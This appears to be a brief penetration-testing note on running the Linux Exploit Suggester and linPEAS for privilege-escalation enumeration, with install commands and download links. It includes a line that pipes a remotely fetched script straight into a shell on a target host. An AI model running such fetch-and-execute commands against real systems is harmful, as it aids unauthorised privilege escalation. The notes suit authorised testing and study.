Linux Exploit suggester
Already part of linPEASS but might be good to run as standalone script for better accuracy
#Download and usage
#Kali package
sudo apt install linux-exploit-suggester
#Perl version if bahs is not available on target
https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
#Curl straight into target if possible
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Last updated